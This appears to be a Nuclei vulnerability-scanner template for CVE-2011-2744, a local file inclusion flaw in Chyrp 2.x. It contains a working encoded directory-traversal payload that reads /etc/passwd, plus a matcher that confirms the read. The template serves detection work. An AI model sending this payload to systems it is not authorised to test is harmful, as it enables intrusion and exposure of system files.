27 lines
759 B
YAML
27 lines
759 B
YAML
|
id: CVE-2011-2744
|
||
|
|
||
|
info:
|
||
|
name: Chyrp 2.x - Local File Inclusion
|
||
|
author: daffainfo
|
||
|
severity: high
|
||
|
description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/35945
|
||
|
- https://www.cvedetails.com/cve/CVE-2011-2744
|
||
|
tags: cve,cve2011,lfi,chyrp
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|